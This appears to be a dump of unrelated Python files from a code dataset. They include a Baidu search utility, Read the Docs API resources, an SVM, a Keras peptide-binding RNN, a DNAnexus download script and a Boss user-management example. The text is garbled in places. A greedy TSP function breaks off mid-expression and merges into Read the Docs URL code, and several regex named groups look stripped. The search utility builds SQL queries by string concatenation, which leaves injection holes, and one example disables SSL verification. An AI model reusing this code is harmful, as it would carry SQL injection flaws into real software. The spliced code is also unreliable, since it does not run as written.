update_accounts_table():\n \"\"\"\n Create Account objects\n \"\"\"\n\n Account.objects.all().delete()\n account_data = read_json(LOCAL_ROOT_ACCOUNT_FILE_PATH)\n accounts = [\n Account(\n account_number=k,\n balance=v['balance'],\n balance_lock=v['balance_lock']\n ) for k, v in account_data.items()\n ]\n Account.objects.bulk_create(accounts)\n","sub_path":"v1/self_configurations/management/commands/initialize_validator.py","file_name":"initialize_validator.py","file_ext":"py","file_size_in_byte":8527,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"284897248","text":"# -*- coding: utf8 -*-\nfrom application.cosinescore import *\n\n\ndef search_baike_list(key_word, N=10):\n \"\"\"\n description: 通关关键字搜索百度百科,返回简略信息\n :param key_word: 关键词\n :param N: 返回条目个数\n :return: return_list: 结果列表,每个元素是一个tuple,tuple的第一个元素是title,\n 第二个元素是描述\n \"\"\"\n doc_id_dict = search(key_word, region=1) # 返回值为字典类型\n if doc_id_dict == None:\n return None\n # result是个list, 每个元素是一个tuple\n results = sorted(doc_id_dict.items(), key=lambda d: d[1], reverse=True) # 先返回10个,后续分页明天说\n\n result_list = []\n for doc_tuple in results: # doc_tuple: (doc_id, 相似度值)\n try:\n cursor.execute('select title, description from baike_title_description where id = ' + doc_tuple[0])\n tmp = list(cursor.fetchone()) # tuple类型\n tmp.append(doc_tuple[0])\n result_list.append(tmp)\n except:\n print(\"===============DataBase error!============\")\n return\n return result_list\n\n\ndef search_question_list(key_word, N=10):\n \"\"\"\n description: 通过关键字搜索百度知道的问题,返回简略信息\n :param key_word: 关键字\n :param N: 返回问题的个数\n :return:\n \"\"\"\n doc_id_dict = search(key_word, region=3)\n if doc_id_dict == None:\n return None\n result_list = []\n results = 
sorted(doc_id_dict.items(), key=lambda d: d[1], reverse=True)\n for doc_tuple in results: # doc_tuple: (doc_id, 相似度值)\n try:\n cursor.execute('select title from baiduzhidao where doc_id=' + doc_tuple[0])\n question = cursor.fetchone()\n cursor.execute('select count(*) from baiduzhidao where doc_id=' + doc_tuple[0])\n num_answers = cursor.fetchone()\n result_list.append((question[0], num_answers[0], doc_tuple[0]))\n except:\n print(\"===============DataBase error!============\")\n return result_list\n\n\ndef search_answer_list(key_word, N=10):\n \"\"\"\n description: 通过关键字搜索百度知道的答案,返回简略信息\n :param key_word: 关键字\n :param N: 返回问题的个数\n :return:\n \"\"\"\n doc_id_dict = search(key_word, region=4)\n if doc_id_dict == None:\n return None\n result_list = []\n results = sorted(doc_id_dict.items(), key=lambda d: d[1], reverse=True)\n for doc_tuple in results: # doc_tuple: (doc_id, 相似度值)\n try:\n cursor.execute('select title, content from baiduzhidao where id=' + doc_tuple[0])\n tmp = list(cursor.fetchone())\n # 因为是显示在列表中,所以必须控制回答的字数\n if len(tmp[1]) > 50:\n tmp[1] = tmp[1][0:50]\n tmp.append(doc_tuple[0])\n result_list.append(tmp)\n except:\n print(\"===============DataBase error!============\")\n return result_list\n\n\ndef search_imaege_list(key_word):\n \"\"\"\n description: 通关关键字搜索图片,PS: 实际只在百度百科里面搜索\n :param key_word:\n :return: 图片的url列表\n \"\"\"\n doc_id_dict = search(key_word, region=1) # 在百科数据里面搜索\n if doc_id_dict is None:\n return None\n # results是个list,每个元素是个tuple---(doc_id, 对应的分数)\n results = sorted(doc_id_dict.items(), key=lambda d: d[1], reverse=True)\n\n result_list = []\n try:\n for doc_id_tuple in results:\n cursor.execute('select title from baike_title_description where id = ' + doc_id_tuple[0])\n title = cursor.fetchone()[0]\n cursor.execute('select description from baike_subtitle_description where subtitle like \"%img%\"and title_id = ' + doc_id_tuple[0])\n image_list = list(cursor.fetchall())\n for image in image_list:\n result_list.append((image[0], title))\n except:\n print(\"===============DataBase error!============\")\n return result_list\n\ndef search_detail_entry(doc_id, image_flag=True):\n \"\"\"\n description: 通过doc_id搜索百科一个条目的详细信息,包括标题和所有子标题以及对应的描述\n :param doc_id:\n :param image_flag:\n :return:\n \"\"\"\n\n entry_info = {}\n try:\n cursor.execute('select title, description from baike_title_description where id = ' + doc_id)\n tmp = cursor.fetchone() # tuple类型\n entry_info['title'] = tmp[0]\n entry_info['description'] = tmp[1]\n cursor.execute('select subtitle, description from baike_subtitle_description where title_id = ' + doc_id)\n tmp = cursor.fetchall() # tuple类型\n entry_info['subInfo'] = tmp\n\n except:\n print(\"===============DataBase error!============\")\n return entry_info\n\n\ndef search_detail_quesiton(doc_id, id_type=0):\n \"\"\"\n description: 通过doc_id搜索知道一个问题的详细信息,包括问题描述和所有的回答,以及该回答的点赞数\n :param doc_id:\n :return:\n \"\"\"\n question_info = None\n try:\n if id_type =='1':\n cursor.execute('select doc_id from baiduzhidao where id = ' + doc_id)\n doc_id = str(cursor.fetchone()[0])\n\n cursor.execute('select title, content, agree, disagree from baiduzhidao where doc_id = ' + doc_id)\n tmp = cursor.fetchall() # tuple类型\n question_info = tmp\n print(len(question_info[1]))\n except:\n print(\"===============DataBase error!============\")\n return question_info\n\n\nif __name__ == '__main__':\n # print(len(search_baike_list('爱因斯坦')))\n # print(search_zhidao_question(\"居里夫人\"))\n # print(search_answer_list(\"居里夫人\"))\n # search_detail_entry(doc_id='51')\n # 
search_detail_quesiton(doc_id=\"20\")\n print(search_imaege_list(\"爱因斯坦\")[0:10])","sub_path":"application/search_util.py","file_name":"search_util.py","file_ext":"py","file_size_in_byte":5993,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"362837373","text":"import numpy as np\n\ndef check_city_status(status, city_index):\n if city_index not in status:\n return True\n else:\n return False\n\ndef greedy_opt(num_cities, dists):\n status = list([-1]) * num_cities\n status[0] = np.random.randint(0, num_cities)\n now_city = status[0]\n\n for index_route in range(1, num_cities):\n min_dist = 1e20\n for next_city in range(0, num_cities):\n if((next_city!=now_city) and check_city_status(status, next_city) and (dists[next_city, now_city]%s)/schema/$' % self._meta.resource_name,\n self.wrap_view('get_schema'),\n name='api_get_schema',\n ),\n url(\n r'^(?P%s)/search%s$' %\n (self._meta.resource_name, trailing_slash()),\n self.wrap_view('get_search'),\n name='api_get_search',\n ),\n url(\n (r'^(?P%s)/(?P[a-z-_]+)/$') % self._meta.resource_name,\n self.wrap_view('dispatch_detail'),\n name='api_dispatch_detail',\n ),\n ]\n\n\nclass VersionResource(ModelResource):\n\n \"\"\"API resource for Version model.\"\"\"\n\n project = fields.ForeignKey(ProjectResource, 'project', full=True)\n\n class Meta:\n allowed_methods = ['get', 'put', 'post']\n always_return_data = True\n queryset = Version.objects.api()\n authentication = PostAuthentication()\n authorization = DjangoAuthorization()\n filtering = {\n 'project': ALL_WITH_RELATIONS,\n 'slug': ALL_WITH_RELATIONS,\n 'active': ALL,\n }\n\n def get_object_list(self, request):\n self._meta.queryset = Version.objects.api(user=request.user)\n return super().get_object_list(request)\n\n def build_version(self, request, **kwargs):\n project = get_object_or_404(Project, slug=kwargs['project_slug'])\n version = kwargs.get('version_slug', LATEST)\n version_obj = project.versions.get(slug=version)\n trigger_build(project=project, version=version_obj)\n return self.create_response(request, {'building': True})\n\n def prepend_urls(self):\n return [\n url(\n r'^(?P%s)/schema/$' % self._meta.resource_name,\n self.wrap_view('get_schema'),\n name='api_get_schema',\n ),\n url(\n r'^(?P%s)/(?P[a-z-_]+[a-z0-9-_]+)/$' # noqa\n % self._meta.resource_name,\n self.wrap_view('dispatch_list'),\n name='api_version_list',\n ),\n url(\n (\n r'^(?P%s)/(?P[a-z-_]+[a-z0-9-_]+)/(?P'\n r'[a-z0-9-_.]+)/build/$'\n ) % self._meta.resource_name,\n self.wrap_view('build_version'),\n name='api_version_build_slug',\n ),\n ]\n\n\nclass FileResource(ModelResource):\n\n \"\"\"API resource for ImportedFile model.\"\"\"\n\n project = fields.ForeignKey(ProjectResource, 'project', full=True)\n\n class Meta:\n allowed_methods = ['get', 'post']\n queryset = ImportedFile.objects.all()\n excludes = ['md5', 'slug']\n include_absolute_url = True\n authentication = PostAuthentication()\n authorization = DjangoAuthorization()\n\n def prepend_urls(self):\n return [\n url(\n r'^(?P%s)/schema/$' % self._meta.resource_name,\n self.wrap_view('get_schema'),\n name='api_get_schema',\n ),\n url(\n r'^(?P%s)/anchor%s$' %\n (self._meta.resource_name, trailing_slash()),\n self.wrap_view('get_anchor'),\n name='api_get_anchor',\n ),\n ]\n\n def get_anchor(self, request, **__):\n self.method_check(request, allowed=['get'])\n self.is_authenticated(request)\n self.throttle_check(request)\n\n query = request.GET.get('q', '')\n try:\n redis_client = cache.get_client(None)\n 
redis_data = redis_client.keys('*redirects:v4*%s*' % query)\n except (AttributeError, redis.exceptions.ConnectionError):\n redis_data = []\n # -2 because http:\n urls = [\n ''.join(data.split(':')[6:]) for data in redis_data\n if 'http://' in data\n ]\n object_list = {'objects': urls}\n\n self.log_throttled_access(request)\n return self.create_response(request, object_list)\n\n\nclass UserResource(ModelResource):\n\n \"\"\"Read-only API resource for User model.\"\"\"\n\n class Meta:\n allowed_methods = ['get']\n queryset = User.objects.all()\n fields = ['username', 'id']\n filtering = {\n 'username': 'exact',\n }\n\n def prepend_urls(self):\n return [\n url(\n r'^(?P%s)/schema/$' % self._meta.resource_name,\n self.wrap_view('get_schema'),\n name='api_get_schema',\n ),\n url(\n r'^(?P%s)/(?P[a-z-_]+)/$' % self._meta.resource_name,\n self.wrap_view('dispatch_detail'),\n name='api_dispatch_detail',\n ),\n ]\n","sub_path":"readthedocs/api/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":7610,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"149135163","text":"spam = ['apples', 'bananas', 'tofu', 'cats']\r\n\r\ndef addAnd(words):\r\n s = \"\"\r\n for i in range(len(words)-1):\r\n s += (words[i] + ', ')\r\n s += ('and ' + words[-1])\r\n return s\r\n\r\nprint(spam)\r\nprint(addAnd(spam))","sub_path":"CommaCode.py","file_name":"CommaCode.py","file_ext":"py","file_size_in_byte":226,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"220295067","text":"import numpy as np\nimport random\nimport copy\n\nclass svm:\n\n def __init__(self, numInputs, learningRate=0.01, regularization = 1, epochs=10):\n random.seed(1)\n self.epochs = epochs\n self.learningRate = learningRate\n self.initLearningRate = learningRate\n self.regularization = regularization\n self.weights = np.array([random.uniform(-0.01, 0.01) for _ in range(numInputs)])\n\n\n def predict(self, inputs):\n return np.sign(np.dot(inputs, self.weights))\n\n def train(self, trainingInputs, inputLabels):\n features = copy.deepcopy(trainingInputs)\n labels = copy.deepcopy(inputLabels)\n comb = list(zip(features, labels))\n\n for e in range(1, self.epochs + 1):\n random.shuffle(comb)\n\n for inputs, label in comb:\n\n if label * np.dot(inputs, self.weights) <= 1:\n self.weights *= (1 - self.learningRate)\n self.weights += self.learningRate * self.regularization * label * inputs\n else:\n self.weights *= 1 - self.learningRate\n\n self.learningRate = self.initLearningRate / (1 + e)\n\n\n return self.weights\n\n def evaluate(self, testInputs, testLabels):\n totErrors = 0\n for inputs, label in zip(testInputs, testLabels):\n if label != self.predict(inputs):\n totErrors += 1\n return 1 - (totErrors / len(testLabels))","sub_path":"svm_random_forest_ensemble/svm.py","file_name":"svm.py","file_ext":"py","file_size_in_byte":1451,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"389247390","text":"# -*- coding: utf-8 -*-\n#including chemistry information\nfrom __future__ import print_function\nfrom keras.models import Sequential, slice_X\nfrom keras.layers.core import Activation, Masking, Dropout, Dense, RepeatVector\nfrom keras.layers import recurrent\nfrom keras.callbacks import ModelCheckpoint\nfrom utilities import *\n\n# model reconstruction from JSON:\nfrom keras.models import model_from_json\npath_save_train = 
'/scratch/users/bchen45/HLA_prediction/RNN_data/training_files/'\npath_save = '/scratch/users/bchen45/HLA_prediction/RNN_data/performance/'\n# how to use the model elsewhere...\n#model = model_from_json(open('my_model_architecture.json').read())\n#model.load_weights('my_model_weights.h5')\n\n##import coding dictionary\npath_dict = '/scratch/users/bchen45/code/python_general/python_general/encoding_dict/'\n#Blosum50_sparse.dict\n#Blosum50_only.dict\n#Sparse_only.dict\ndict_name = 'Blosum50_sparse.dict'\ndict_aa = pickle.load(open(path_dict+dict_name,'r'))\n\n# Parameters for the model and dataset\n#TRAINING_SIZE = len(inputs)\n# Try replacing JZS1 with LSTM, GRU, or SimpleRNN\nRNN = recurrent.JZS1\nfirst_run = True\n#default iteration 20 for the first run, iteration 40\nn_iteration_1 = 51\nn_iteration_2 = 31\nHIDDEN_SIZE = 16\nBATCH_SIZE = 20\nLAYERS = 2\nratio_t = 1\nchars = 'ARNDCQEGHILKMFPSTWYVBZX'#'0123456789+ '\nif dict_name == 'Blosum50_sparse.dict':\n chars = chars + chars\nclasses = [0,1]\n \n\n#start a model\nmodel = Sequential()\n# \"Encode\" the input sequence using an RNN, producing an output of HIDDEN_SIZE\n#model.add(Masking())\nmodel.add(RNN(HIDDEN_SIZE, input_shape=(None, len(chars)), return_sequences=True))\nfor _ in xrange(LAYERS-1):\n model.add(RNN(HIDDEN_SIZE, return_sequences=True))\n #model.add(Dropout(0.5))\nmodel.add(RNN(HIDDEN_SIZE, return_sequences=False))\nmodel.add(Dense(len(classes)))\nmodel.add(Activation('softmax'))\nmodel.compile(loss='categorical_crossentropy', optimizer='RMSprop')\n#adam\n#model1 = model\n#save the model\n#json_string = model.to_json()\n#open(path_save+file_name0+'_model.json', 'w').write(json_string)\n\n#encoding will take a string or char, string=sequence and to return a matrix of encoded peptide sequence\n#char = class, '0' = non-binding (0,1), '1' = binding (1,0)\ndef encoding_line(str0, max_len):\n #print(type(dict_aa['A']))\n #print(type(list(dict_aa['A'])))\n #print(type(max_len))\n if len(str0) == 1:\n coded0 = np.zeros(2)\n if str0 == '0':\n coded0[0] = 1\n else:\n coded0[1] = 1\n else:\n coded0 = np.zeros((max_len,len(list(dict_aa['A']))))\n for i,char0 in enumerate(str0):\n coded0[i,:] = dict_aa[char0] \n #print(str0)\n #print(coded0)\n return coded0\n\ndef encoding(matrix0, input0, len0):\n for i, sentence in enumerate(input0):\n matrix0[i] = encoding_line(sentence, len0)\n return matrix0\n\ndef output_perf(file_out, file_name0, iteraions,training_n, train_pre,train_recall,val_pre,val_recall):\n file_out.write(file_name0+'_training_n '+training_n+'\\n')\n file_out.write(file_name0+'_'+'iterations'+'\\t')\n for x0 in iterations:\n file_out.write(x0+'\\t')\n file_out.write('\\n')\n file_out.write(file_name0+'_'+'Training_precision'+'\\t')\n for x0 in train_pre:\n file_out.write(x0+'\\t')\n file_out.write('\\n')\n file_out.write(file_name0+'_'+'Training_recall'+'\\t')\n for x0 in train_recall:\n file_out.write(x0+'\\t')\n file_out.write('\\n')\n file_out.write(file_name0+'_'+'Validation_precision'+'\\t')\n for x0 in val_pre:\n file_out.write(x0+'\\t')\n file_out.write('\\n')\n file_out.write(file_name0+'_'+'Validation_recall'+'\\t')\n for x0 in val_recall:\n file_out.write(x0+'\\t')\n file_out.write('\\n')\n file_out.close()\n\nfor file_name0 in open(path_save_train+'file_names_decluster.csv'):\n #model = model1\n file_name0 = file_name0.rstrip()\n inputs=[]\n outputs=[]\n char_set = set([' '])\n class_set = set()\n max_len = 0\n X_train = []\n X_train_p = []\n X_train_n = []\n X_val_p = []\n X_val_n = []\n y_train = []\n y_val_p = 
[]\n y_val_n = []\n #file_name0 ='HLADRB10401simplev1_tr_1_val.csv'\n for line in fileinput.input(path_save_train+file_name0):\n in_,out_ = [x.rstrip() for x in line.split(\"\\t\")]\n if len(out_) != 1:\n raise Exception(\"Output should be single characer\")\n else:\n if out_ == '0' :\n X_train_n.append(in_)\n X_train.append(in_)\n y_train.append(out_)\n elif out_ == '1':\n X_train_p.append(in_)\n X_train.append(in_)\n y_train.append(out_)\n else:\n out_ = str(int(out_) -2)\n if out_ == '0':\n X_val_n.append(in_)\n y_val_n.append(out_)\n else:\n X_val_p.append(in_)\n y_val_p.append(out_)\n \n max_len = max([max_len,len(in_),len(out_)])\n inputs.append(in_)\n outputs.append(out_)\n \n #for c in in_: char_set.add(c)\n class_set.add(out_)\n file_name0 = file_name0.split('.')[0] \n \n #creating encoding table\n print(class_set)\n classes = ''.join(class_set)\n #ctable = CharacterTable(chars, MAXLEN)\n #classtable = CharacterTable(classes, 1)\n MAXLEN = max_len #DIGITS + 1 + DIGITS\n #create training or validation matrix\n X_train_m = np.zeros((len(X_train), MAXLEN, len(chars)), dtype=np.bool)\n X_val_p_m = np.zeros((len(X_val_p), MAXLEN, len(chars)), dtype=np.bool)\n X_val_n_m = np.zeros((len(X_val_n), MAXLEN, len(chars)), dtype=np.bool)\n X_train_p_m = np.zeros((len(X_train_p), MAXLEN, len(chars)), dtype=np.bool)\n X_train_n_m = np.zeros((len(X_train_n), MAXLEN, len(chars)), dtype=np.bool)\n y_train_m = np.zeros((len(y_train), len(classes)), dtype=np.bool)\n y_val_p_m = np.zeros((len(y_val_p), len(classes)), dtype=np.bool)\n y_val_n_m = np.zeros((len(y_val_n), len(classes)), dtype=np.bool)\n \n X_train = encoding(X_train_m, X_train,MAXLEN)\n X_train_p = encoding(X_train_p_m, X_train_p,MAXLEN)\n X_train_n = encoding(X_train_n_m, X_train_n,MAXLEN)\n X_val_p = encoding(X_val_p_m, X_val_p,MAXLEN)\n X_val_n = encoding(X_val_n_m, X_val_n,MAXLEN)\n y_train = encoding(y_train_m, y_train,1)\n y_val_p = encoding(y_val_p_m, y_val_p,1)\n y_val_n = encoding(y_val_n_m, y_val_n,1)\n \n X_val = np.concatenate((X_val_n,X_val_p))\n y_val = np.concatenate((y_val_n,y_val_p))\n print(len(X_train),len(X_val))\n print(\"loaded input\")\n\n #Create checkpoint\n #checkpointer = ModelCheckpoint(filepath=model_name+'.weight', verbose=1, save_best_only=True)\n # Train the model each generation and show predictions against the validation dataset\n #file_out = open(path_save+'model_performance_chemv2.csv','a')\n version = '_chem_fixed_decluster_16'\n if os.path.isfile(path_save+'model_performance'+version+'.csv'): \n file_out = open(path_save+'model_performance'+version+'.csv','a')\n else:\n file_out = open(path_save+'model_performance'+version+'.csv','w+')\n iterations = []\n train_pre = []\n train_recall = []\n val_pre = []\n val_recall = []\n ptotal0 = len(X_train_p)\n ntotal0 = len(X_train_n)\n training_n = str(ptotal0+ntotal0)\n if first_run :\n n_iteration = n_iteration_1\n first_run = False\n else: \n n_iteration = n_iteration_2\n for iteration in range(1, n_iteration):\n iterations.append(str(iteration))\n print()\n print('-' * 50)\n print('Iteration', iteration)\n \n model.fit(X_train, y_train, batch_size=BATCH_SIZE, nb_epoch=1, class_weight={1:1,0:1.0/ratio_t/2},validation_data=(X_val, y_val),show_accuracy=True) \n #####predicting training\n ptotal0 = len(X_train_p)\n ntotal0 = len(X_train_n)\n #print('Train_Postive')\n #print(model.predict_classes(X_val_p)) \n tp0 = sum(model.predict_classes(X_train_p))+0.1\n #print('Train_Negative')\n #print(model.predict_classes(X_val_n)) \n fp0 = 
sum(model.predict_classes(X_train_n))\n tn0 = ntotal0 - fp0\n fn0 = ptotal0 - tp0\n train_pre.append(str(float(tp0)/(tp0+fp0)))\n train_recall.append(str(float(tp0)/(tp0+fn0)))\n print('Train_Precision='+str(float(tp0)/(tp0+fp0)))\n print('Train_Recall='+str(float(tp0)/(tp0+fn0)))\n \n ######predicting validation\n #print('Val_Postive')\n #print(model.predict_classes(X_val_p)) \n ptotal0 = len(X_val_p)\n ntotal0 = len(X_val_n)\n tp0 = sum(model.predict_classes(X_val_p))+0.1\n #print('Val_Negative')\n #print(model.predict_classes(X_val_n)) \n fp0 = sum(model.predict_classes(X_val_n))\n tn0 = ntotal0 - fp0\n fn0 = ptotal0 - tp0\n val_pre.append(str(float(tp0)/(tp0+fp0)))\n val_recall.append(str(float(tp0)/(tp0+fn0)))\n print('Val_Precision='+str(float(tp0)/(tp0+fp0)))\n print('Val_Recall='+str(float(tp0)/(tp0+fn0)))\n #save weights and performance info\n output_perf(file_out,file_name0,iterations,training_n, train_pre,train_recall,val_pre,val_recall)\n #model.save_weights(path_save+file_name0+'_chemv1_weight.h5',overwrite=True)\n","sub_path":"scripts_sh_verified/Old_HLA_RNN/HLA_RNN_classifier_spar_chem_v12_mutli_train_decluster.py","file_name":"HLA_RNN_classifier_spar_chem_v12_mutli_train_decluster.py","file_ext":"py","file_size_in_byte":9358,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"74037721","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\n###\n# © 2018 The Board of Trustees of the Leland Stanford Junior University\n# Nathaniel Watson\n# nathankw@stanford.edu\n###\n\n\"\"\"\nTo fill in.\n\"\"\"\n\nimport os\nimport subprocess\nimport logging\nimport argparse\nimport pdb\nimport re\nimport sys\n\nimport dxpy\n\nimport scgpm_seqresults_dnanexus.dnanexus_utils\n#import encode.dcc_submit as en #module load gbsc/encode/prod\nimport gbsc_dnanexus.utils #load the environment module gbsc/gbsc_dnanexus\n\ndef get_parser():\n parser = argparse.ArgumentParser(description=__doc__,formatter_class=argparse.RawTextHelpFormatter)\n\n parser.add_argument(\"--errlog\",required=True,help=\"\"\"\n Log file name to write errors to (i.e. When a DNAnexus project isn't found). Will be opened \n in append mode.\"\"\")\n\n parser.add_argument('-l',\"--library-name\",help=\"\"\"\n The library name of the sample that was sequenced. This is name of the library that was \n submitted to SCGPM for sequencing. This is added as a property to all sequencing result \n projects through the 'library_name' project property.\"\"\")\n\n parser.add_argument(\"--uhts-run-name\",help=\"\"\"\n The name of the sequencing run in UHTS. This is added as a property to all projects in \n DNAnexus through the 'seq_run_name' project property. Use this option in combination with \n --library-name and --lane to further restrict the search space, which is useful especially \n since multiple DNAnexus projects can have the same library_name property value (i.e. if \n resequencing the same library).\"\"\")\n\n parser.add_argument(\"--dx-project-name\",help=\"\"\"\n The name of the sequencing run project in DNAnexus.\"\"\")\n\n parser.add_argument(\"--lane\",type=int,help=\"\"\"\n The lane number of the flowcell on which the library was sequenced. This is added as a \n property to all projects in DNAnexus through the 'seq_lane_index' property. Use this in \n conjunction with --library-name and --uhts-run-name to further restrict the project search space.\"\"\")\n\n parser.add_argument('-b',\"--barcode\",nargs=\"+\",help=\"\"\"\n The barcode of the sequenced sample. 
If specified, then only FASTQs with these barcodes will \n be downloaded. Otherwise, all FASTQs will be downloaded.\"\"\")\n\n parser.add_argument(\"-d\",\"--file-download-dir\",required=True,help=\"\"\"\n Local directory in which to download the FASTQ files.\"\"\")\n\n parser.add_argument(\"--not-found-error\",action=\"store_true\",help=\"\"\"\n Presence of this options means to raise an Exception if a project can't be found on DNAnexus \n with the provided input.\"\"\")\n return parser\n\ndef main():\n debug_logger = logging.getLogger(__name__)\n parser = get_parser()\n args = parser.parse_args()\n library_name = args.library_name\n uhts_run_name = args.uhts_run_name\n dx_project_name = args.dx_project_name\n lane = args.lane\n barcodes = args.barcode\n file_download_dir = args.file_download_dir\n if not os.path.exists(file_download_dir):\n os.makedirs(file_download_dir)\n not_found_error = args.not_found_error\n \n dxsr = scgpm_seqresults_dnanexus.dnanexus_utils.DxSeqResults(library_name=library_name,uhts_run_name=uhts_run_name,dx_project_name=dx_project_name,sequencing_lane=lane)\n if dxsr.dx_project_id:\n for b in barcodes:\n dxsr.download_fastqs(barcode=b,dest_dir=file_download_dir)\n else:\n log_msg = \"\"\"Could not find DNAnexus project for input of:\n DNAnexus User Name : {user}\n Library Name : {lib}\n UHTS Run Name: : {uhts}\n DNAnexus Project Name: {p}\n Sequencing Lane : {lane}\n \\n\"\"\".format(user=scgpm_seqresults_dnanexus.dnanexus_utils.get_dx_username(strip_prefix=True),lib=library_name,uhts=uhts_run_name,p=dx_project_name,lane=lane)\n debug_logger.critical(log_msg)\n \n if not_found_error:\n msg = \"Could not find DNAnexus project.\"\n raise gbsc_dnanexus.utils.DxProjectNotFound(msg)\n \n #fastq_dico: Keys are the file names of the FASTQs and values are the fully qualified paths to the FASTQs.\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"scgpm_seqresults_dnanexus/scripts/download_fastqs.py","file_name":"download_fastqs.py","file_ext":"py","file_size_in_byte":4023,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"335113876","text":"class Vertex():\n def __init__(self,data):\n self.data = data\n self.adjList = []\n self.edges_source = []\n self.color = \"white\"\n self.parent = None\n self.d = 0\n self.f = 0\n\nclass Edge():\n def __init__(self,source,target):\n source.adjList.append(target)\n self.source = source\n self.target = target\n self.data = None\n \nclass Graph():\n def __init__(self):\n self.vertexset = []\n self.edgeset = []\n \n def insert_vertex(self,vertex):\n self.vertexset.append(vertex)\n \n def insert_edge(self,source,target):\n edge = Edge(source,target)\n source.edges_source.append(edge)\n self.edgeset.append(edge)\n \n \ntime = 0\ndef DFS(graph):\n for vertex in graph.vertexset:\n if vertex.color == \"white\":\n DFS_Visit(graph,vertex)\n\ndef CLEAR(graph):\n for v in graph.vertexset:\n v.color = \"white\"\n for e in graph.edgeset:\n e.data = None \n \ndef DFS_Visit(graph,u):\n global time\n time = time+1\n u.d = time\n u.color = \"gray\"\n for v in u.adjList:\n if v.color == \"white\":\n v.parent = u\n DFS_Visit(graph,v)\n elif v.color == \"gray\":\n a=what_edge(u.data,v.data,graph.edgeset)\n a.data=\"B\"\n \n else:\n if v.d > u.d :\n a=what_edge(u.data,v.data,graph.edgeset)\n a.data=\"F\"\n elif u.d > v.d:\n a=what_edge(u.data,v.data,graph.edgeset)\n a.data=\"C\"\n u.color = \"black\"\n time = time+1\n u.f = time\n \ndef what_edge (origin, end, lista):\n for i in lista:\n if 
i.source.data == origin and i.target.data == end:\n return i\n return None\n\ndef path(start, end, graph):\n CLEAR(graph)\n DFS_Visit(graph,start)\n path_aux(start, end, [], [])\n \n\ndef path_aux(start, end, walk, trash):\n neighbors = start.edges_source\n walk_now = walk.copy()\n walk_now.append(start.data)\n if start.data == end.data:\n print(walk_now)\n else:\n for edge in neighbors:\n trash_now = trash.copy()\n if edge.data == \"B\":\n if edge in trash_now:\n pass\n else:\n trash_now.append(edge)\n path_aux(edge.target,end,walk_now,trash_now)\n else:\n path_aux(edge.target,end,walk_now,trash_now)\n\n \ng=Graph()\na = Vertex(\"a\")\nb = Vertex(\"b\")\nc = Vertex(\"c\")\nd = Vertex(\"d\")\ne = Vertex(\"e\")\nf = Vertex(\"f\")\ng.insert_vertex(a)\ng.insert_vertex(b)\ng.insert_vertex(c)\ng.insert_vertex(d)\ng.insert_vertex(e)\ng.insert_vertex(f)\n\ng.insert_edge(a,b)\ng.insert_edge(a,c)\ng.insert_edge(a,d)\ng.insert_edge(a,e)\ng.insert_edge(b,c)\ng.insert_edge(b,f)\ng.insert_edge(c,d)\ng.insert_edge(d,a)\ng.insert_edge(d,e)\n\n\nfor vert_s in g.vertexset:\n for vert_t in g.vertexset:\n if vert_t != vert_s:\n print( \"\\n\" + str(vert_s.data) + \" -> \" + str(vert_t.data))\n path(vert_s, vert_t, g)\n","sub_path":"grupo_PaulaDaco_HenriqueMuniz.py","file_name":"grupo_PaulaDaco_HenriqueMuniz.py","file_ext":"py","file_size_in_byte":3112,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"208323919","text":"# Copyright 2016 The Johns Hopkins University Applied Physics Laboratory\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\n\"\"\"\nThis example demonstrates user management. To run this example, you must have \na user with either the user-manager role or the admin role.\n\"\"\"\n\nfrom ndio.remote.boss.remote import Remote, LATEST_VERSION\nfrom ndio.ndresource.boss.resource import *\nfrom requests import HTTPError\n\nAPI_VER = LATEST_VERSION\nrmt = Remote('example.cfg')\n#rmt = Remote('test.cfg')\nrmt.group_perm_api_version = API_VER\n\n# Turn off SSL cert verification. This is necessary for interacting with\n# developer instances of the Boss.\nimport requests\nfrom requests.packages.urllib3.exceptions import InsecureRequestWarning\nrequests.packages.urllib3.disable_warnings(InsecureRequestWarning)\nrmt.project_service.session_send_opts = { 'verify': False }\nrmt.metadata_service.session_send_opts = { 'verify': False }\nrmt.volume_service.session_send_opts = { 'verify': False }\n\nuser = 'example_user'\n\nprint('Creating user . . .')\nrmt.user_add(user, 'John', 'Doe', 'jd@me.com', 'secure_password')\n\nprint('\\nGet the user just created . . .')\nuser_data = rmt.user_get(user)\nprint(user_data)\n\nprint('\\nMake the user a resource manager . . .')\nrmt.user_add_role(user, 'resource-manager')\n\nprint('\\nList the user\\'s roles . . .')\nprint(rmt.user_get_roles(user))\n\nprint('\\nRemove the resource manager role . . .')\nrmt.user_delete_role(user, 'resource-manager')\n\nprint('\\nList the user\\'s roles again. . 
